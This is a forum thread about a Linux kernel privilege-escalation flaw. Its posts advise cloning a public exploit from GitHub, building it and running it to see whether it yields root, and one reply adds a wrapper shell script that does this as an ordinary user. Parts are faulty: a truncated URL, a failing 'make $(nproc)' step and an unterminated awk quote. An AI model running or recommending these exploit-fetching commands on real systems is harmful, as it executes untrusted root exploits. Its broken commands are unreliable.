russian hackers started the implementation and make use of this recent copy fail vulnerability, update your kernel ! and protect yourself
Q : Am I affected , what should I do
first check/verify the cve on your system by
git clone --depth 1 https://github.com/tgies/c
cd copy-fail-c
make $(nproc)
./exploit
if you got root access you are affected
And you should immediately update your linux kernel
all version got patched,
don’t ignore because attacker might implement this vulnerability in tiny blob inside proprietary software
I’ve modified your instruction sequence into something people might be more willing to run. Hope you don’t mind.
Session Log:
$ ./CVE-2026-31431__probe.sh
Identified test user ID: ericthered ...
Continue ? [y|N] => y
Cloning into 'copy-fail-c'...
remote: Enumerating objects: 87, done.
remote: Counting objects: 100% (87/87), done.
remote: Compressing objects: 100% (77/77), done.
remote: Total 87 (delta 7), reused 75 (delta 7), pack-reused 0 (from 0)
Receiving objects: 100% (87/87), 102.63 KiB | 2.23 MiB/s, done.
Resolving deltas: 100% (7/7), done.
total 132
-rw-rw-r-- 1 ericthered ericthered 3553 Apr 30 23:44 exploit.c
-rw-rw-r-- 1 ericthered ericthered 4783 Apr 30 23:44 exploit-passwd.c
-rw-rw-r-- 1 ericthered ericthered 297 Apr 30 23:44 LICENSE-LGPL
-rw-rw-r-- 1 ericthered ericthered 1066 Apr 30 23:44 LICENSE-MIT
-rw-rw-r-- 1 ericthered ericthered 6433 Apr 30 23:44 Makefile
drwxrwxr-x 3 ericthered ericthered 4096 Apr 30 23:44 nolibc
-rw-rw-r-- 1 ericthered ericthered 1616 Apr 30 23:44 payload.c
-rw-rw-r-- 1 ericthered ericthered 15783 Apr 30 23:44 README.ja.md
-rw-rw-r-- 1 ericthered ericthered 14085 Apr 30 23:44 README.ko.md
-rw-rw-r-- 1 ericthered ericthered 11103 Apr 30 23:44 README.md
-rw-rw-r-- 1 ericthered ericthered 21644 Apr 30 23:44 README.ru.md
-rw-rw-r-- 1 ericthered ericthered 11055 Apr 30 23:44 README.zh-cn.md
-rw-rw-r-- 1 ericthered ericthered 4871 Apr 30 23:44 utils.c
-rw-rw-r-- 1 ericthered ericthered 758 Apr 30 23:44 utils.h
-rw-rw-r-- 1 ericthered ericthered 3454 Apr 30 23:44 vulnerable.c
Number of processing units: 4 ...
Opportunity to review contents of directory 'copy-fail-c' ...
When ready, hit return to run 'make 4' ...
make: *** No rule to make target '4'. Stop.
RC = 2
FAILED: unable to successfully run 'make 4'.
Test suite not designed to test current HOST configuration/installation ...
UNABLE TO DETERMINE DEGREE OF EXPOSURE!
$
So, for me, it could not perform the specified test.
Script: CVE-2026-31431__probe.sh
#!/bin/sh
#set -x
getUser()
{
for users in $( cd /home ; ls | grep -xE '[[:alpha:]]+' )
do
grep '^'${users} /etc/passwd
done |
cut -f1-3 -d\: | sort -n -t ":" -k3.1,4.0 | head -1 | cut -f1 -d\:
}
user=$( getUser )
test -z "${user}" && { echo "\n Unable to identify basic user ID [null] for testing of CVE.\n" ; exit 1 ; }
test "${user}" = "root" && { echo "\n Unable to identify basic user ID [root] for testing of CVE.\n" ; exit 1 ; }
echo "\n\t Identified test user ID: ${user} ...\n\n\t Continue ? [y|N] => \c" ; read ans
test -z "${ans}" && ans="N"
case "${ans}" in
y* | Y* ) echo "" ;;
* ) echo "\n\t Probe for CVE test ... ABANDONED!\n" ; exit 2 ;;
esac
git clone --depth 1 https://github.com/tgies/copy-fail-c
test $? -eq 0 || { echo "\n\t FAILED: unable to download files required for test from GitHub! ABANDONED!\n" ; exit 1 ; }
cd copy-fail-c
ls -l
nProc=$(nproc)
echo "\n\t Number of processing units: ${nProc} ..."
echo "\n\t Opportunity to review contents of directory 'copy-fail-c' ... \n\n\t When ready, hit return to run 'make ${nProc}' ... \c" ; read k
make "${nProc}"
RC=$?
echo "\t RC = ${RC}"
test ${RC} -eq 0 || { echo "\n\t FAILED: unable to successfully run 'make ${nProc}'. \n\n\t Test suite not designed to test current HOST configuration/installation ... \n\n\t UNABLE TO DETERMINE DEGREE OF EXPOSURE!\n" ; exit 1 ; }
echo "\n\t Contents of './exploit' :\n"
awk '{ printf("\t| %s\n", $0 ) } ./exploit
echo "\n\t Opportunity to review contents of file './exploit' ... \n\n\t When ready, hit return to run './exploit' ... \c" ; read k
su --login ${user} --command="./exploit"
